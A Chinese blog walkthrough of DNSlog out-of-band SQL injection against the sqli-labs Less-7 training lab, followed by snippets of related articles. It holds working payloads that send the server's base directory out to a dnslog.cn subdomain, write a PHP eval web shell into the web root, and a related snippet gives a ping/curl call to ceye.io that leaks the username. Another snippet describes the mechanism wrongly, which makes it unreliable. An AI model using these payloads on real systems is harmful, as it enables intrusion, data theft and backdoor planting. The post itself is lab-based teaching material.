DNSlog注入思路

最新推荐文章于 2024-06-28 11:53:51 发布
最新推荐文章于 2024-06-28 11:53:51 发布
阅读量612 收藏
点赞数 5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47912094/article/details/119739518
版权

之前看到的思路今天来整整^^;
dnslog网址:http://www.dnslog.cn/

拿我们熟悉的sqli-labs,第7关来开刀^^;
在这里插入图片描述
正常显示:
在这里插入图片描述
错误显示:
在这里插入图片描述
猜测到注入点是字符型,单引号加两个小括号,?id=1’))
在这里插入图片描述

OK那接下来在用dnslog之前得看一下mysql中secure_file_priv变量得值;
因为配置值不同会产生影响:
在这里插入图片描述
修改这个变量值可以通过my.ini去进行修改,如果my.ini没有这个变量自行加上即可。
修改完记得重启然后检查一下是否修改成功:
在这里插入图片描述
接下来就可以利用读文件函数load_file(),结合dnslog.cn网站,实现带外攻击。
构造payload:
在这里插入图片描述
虽然执行完页面还是会显示报错,但不影响获取结果:
在这里插入图片描述
拿完库名接下来的表名等自行修改即可。

还可以通过dnslog 来获取文件路径:
构造payload为:
http://localhost/sqli-labs/Less-7/?id=1’)) and load_file(concat(’\\’,(substr(hex(@@basedir),1,30)),’.umgkxt.dnslog.cn\coke’)) --+

http://localhost/sqli-labs/Less-7/?id=1’)) and load_file(concat(’\\’,(substr(hex(@@basedir),31,30)),’.umgkxt.dnslog.cn\coke’)) --+

在这里插入图片描述
然后拼接起来十六进制解码得出:
在这里插入图片描述
在这里插入图片描述
获取到文件路径可以进行写入文件了;
构造语句:?id=-1’)) union select 1,2,’<?php @eval($_REQUEST[coke])?>’ into outfile ‘D:\phpstudy\phpstudy_pro\WWW\99.php’ --+
来到网站目录下,发现写入成功:在这里插入图片描述
也可以使用into dumpfile来写入;
然后通过菜刀,蚁剑等工具进行连接即可。

CoOlCoKeZ
关注
DNSlog平台详解
不忘初心,护天下安全!
09-21 4298
DNSLOG 是解析日志, DNS分为三级域名, 域名不区分大小写, 所以利用解析的日志把攻击者需要的值带出, 称为数据外带,原理上只要能进行DNS请求的函数都可能存在DNSlog注入,如命令执行、SSRF、XXE、sql盲注、xxs盲打等。在windows和linux因具体shell指令不同,因此需要分情况讨论,但思路一致,通过在dnslog平台的查询中,插入主机指令执行后的结果,将结果数据外带。以靶场 pikachu 的时间盲注为例,输入qianli' and sleep(5)#,耗时5秒。
好用的dnslog在线平台
热门推荐
siu~
08-21 2万+
dnslog在线平台分享
DNSlog注入
7Riven's blog
12-31 924
DNSlog注入产生 测试一些网站的时候,一些注入都是无回显的,可以通过写脚本来进行盲注,但有些网站会ban掉我们的ip,可以通过设置ip代理池解决,但是盲注往往效率很低,所以产生了DNSlog注入DNSlog注入应用场景 sql注入的盲注、无回显的命令执行、无回显的SSRF DNSlog注入原理 有一个可以配置的域名(比如:ceye.io),然后通过代理商设置域名(ceye.io)...
【安全工具】DNSlog工具原理搭建及使用(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python_paipai的博客
06-28 3233
比如说,我注册了一个为luomiweixiong.com的域名,我将 它的a记录泛解析到139.x.x.x上,这样就实现了无论我记录值填什么他都有解析,并且都指向139.x.x.x,当我向dns服务器发起test.luomiweixiong.com的解析请求时,DNSlog中会记录下他给test.luomiweixiong.com解析,解析值为139.x.x.x.网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
DNSLOG 注入
qq_33441500的博客
10-21 721
DNSLOG 注入 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过DNSlog把想获...
dnslog注入
qq_40039615的博客
06-11 175
首先 ceye是一个网站 不是一个应用程序 http://ceye.io 这个是他的网址 操作: ping %USERNAME%.b182oj.ceye.io curl sk7s6n.ceye.io 核心语法:Loadfile 函数只能在windows操作系统执行,所以目标一定要是windows操作系统 SELECT LOAD_FILE(CONCAT('\\\\',(select database()),'.mysql.sk7s6n.ceye.io\\test')); 官方.
DNSLog注入
一期一会的博客
01-13 4280
DNSLog注入原理 在sql注入时为布尔盲注、时间盲注,注入的效率低且线程高容易被waf拦截,又或者是目标站点没有回显,我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功,这时候就要用到我们的DNSlog注入。 首先需要有一个可以配置的域名,比如:xxx.io,然后通过代理商设置域名 xxx.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Server,这样以来所有 xxx.io 及其子域名的查询都会到 服务器 A 上,这时就能够实时地监控域名查询请
DNSlog注入原理
sjp_1996的博客
04-20 3286
DNSlog注入原理及实验 遵守我国网络安全法,仅用于渗透测试交流学习。 DNS解析过程 用户输入域名,浏览器知道是域名,然后通过DNS解析为IP地址,最后浏览器通过IP地址访问服务器。IP地址与域名是应是一对多映射的关系。 DNSlog的产生 DNS在解析的过程中产生日志文件,这些日志文件记录了访问时间、域名、IP地址等信息内容。 实验 1、公共DNS免费平台:www.DNSlog.con,点击GetSubDomain,会随机生成一个域名。 此时打开CMD,用ping命令,ping通这个域名。因为我的
yxcms1.4.7版本审计sql注入-文件删除盲注配合dnslog解析数据
qq_29437513的博客
08-16 822
这是一篇cms审计内容,和之前做的文件包含+伪协议、反序列化入门内容不同,,拿项目练手。 我找了一下网上关于yxcms的漏洞,谷歌收录到1.4.6存在前台注入和后台文件删除盲注这两个洞,,对比发现1,4,7版本源码几乎相同。 下好1.4.7源码放到www目录下,访问进入了一个安装的页面 在找漏洞审计之前,登录后台关闭后登不上,提示站点账户锁定,这里折腾了很久,所以整个审计过程都不能关闭后台。 然后打开phpstorm开始审计源码: 这里我对phpstorm的操作不了解,看del函数这里 刚开始审计也不
命令执行无回显的判断方法及DNSLOG相关例题的讲解
blue_fantasy的博客
01-10 1729
Text. 命令无回显的情况 判断方法 1.延时 2.HTTP请求 3.DNS请求 <?php highlight_file(__FILE__); shell_exec($_GET[1]); ?> (1)通过传入1=ls|sleep(3) 页面加载3秒左右才显示来证明注入语句带入成功 传入1=ls|curl 192.168.12.104:8000前先在本机开启nc -lvp 8000 (2)通过提前nc监听,利用curl命令进行信息获取 (3)提前注册ceye.io平
Sql注入漏洞汇总-上
黑战士的博客
06-04 719
DNSlog注入,也叫DNS带外查询,它是属于带外通信的一种(Out of Band,简称OOB)。寻常的注入基本都是在同一个信道上面的,比如正常的get注入,先在url上插入payload做HTTP请求,然后得到HTTP返回包,没有涉及其他信道。而所谓的带外通信,至少涉及两个信道信道:在计算机中指通信的通道,是信号传输的媒介。
漏洞扫描(kali beef-xss、DNSlog、CSRF、SSRF)
m0_61506558的博客
08-04 1588
并且其中的内容会被服务器端执行,插入的代码可能导致任意文件读取、系统命令执行、内网端口 探测、攻击内网网站等危害。,'.yourid.ceye.io/jinyiuxin'))),1,0) 黑体处拼接SQL语句。gopher协议:是一种信息查找系统,只支持文本,不支持图像,已被HTTP替代。第三方网站利用被攻击网站生效的cookie,直接对服务器接口发起请求。抓取正常通信请求的数据包,再请求一次。.........
DNS_LOG注入
学习、分享、交流
05-19 1609
DNSLOG注入:利用DNS解析,日志记录把数据库里面的内容给带出来···
mysql注入---DNSLOG注入
nini_boom的博客
07-21 572
不一定学习进度速度快,就代表掌控的东西就多。学习的目标在于对于理解的知识深度和广度,速度快会有很多时间学习广度的东西,但在有限广度的情况下,理解的深度才是更重要的,所以在这种情况下,不要在意学习的进度,把握住学习的节奏,向更深处理解。扎下深根的竹子,在疯狂生长的时候才有更多的后备力量。 0x01 DNSLOG注入 当我们遇到了盲注、延时注入时,页面没有具体的返回。 但是盲注、延时注入需要进行大...
DNSlog注入(利用DNSlog平台将SQL盲注变成回显注入
柠檬i的博客
08-07 1450
DNSlog注入是一种利用DNS服务器记录域名解析请求的特性,来获取SQL注入结果的技术。它的原理是通过构造一个包含数据库信息的子域名,然后使用MySQL的load_file函数或其他方法,让目标服务器向DNS服务器发起解析请求,从而在DNS服务器上留下注入结果的痕迹。
SQL注入DNS_log注入
weixin_47785246的博客
07-11 881
SQL注入DNS_log注入 这篇文章将系统的讲解,SQL注入中的DNS_log注入的原理、方法、以及靶场练习writeup。 文章目录SQL注入DNS_log注入前言一、DNS_log注入原理二、靶场实战1.DNSlog 平台2.封神台靶场总结 前言 关于SQL注入的详细内容请看我之前写的文章 提示:以下是本篇文章正文内容,下面案例可供参考 一、DNS_log注入原理 我们都知道,DNS解析是一种用户访问域名时,客户端向DNS发起DNS查询的到目标服务器ip地址,进而实现通信的机制,而
dnslog注入原理
07-29
DNSLog注入是一种利用DNS协议的安全漏洞进行攻击的方法。它利用了DNS服务器对于域名解析请求的处理方式,通过在恶意构造的域名中插入恶意代码,从而实现对目标系统的攻击或信息收集。 具体的注入原理如下: 1. DNS解析过程:当用户在浏览器中输入一个URL并发送请求时,操作系统会将URL发送给本地DNS服务器进行解析。DNS服务器会向根域名服务器发起查询请求,逐级查询直到找到对应的IP地址。 2. 恶意域名构造:攻击者构造一个恶意域名,其中包含了恶意代码或者指向恶意服务器的IP地址。恶意代码可以是任意可执行的代码,如JavaScript代码、Shell命令等。 3. DNS解析注入:攻击者向本地DNS服务器发送一个查询请求,并在请求中包含恶意域名。本地DNS服务器在解析该域名时,会向上级DNS服务器发起查询请求,直到找到对应的IP地址。在这个查询过程中,恶意代码会被执行。 4. 恶意代码执行:当上级DNS服务器将查询结果返回给本地DNS服务器时,本地DNS服务器会将结果返回给用户的操作系统。操作系统接收到结果后,会将其交给浏览器进行处理。如果结果中包含恶意代码,浏览器会执行该代码。 通过以上的注入原理,攻击者可以实现对目标系统的攻击,如执行恶意脚本、获取敏感信息等。为了防止DNSLog注入攻击,可以采取一些安全措施,如使用DNSSEC来验证DNS响应的真实性、限制DNS解析的递归查询等。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值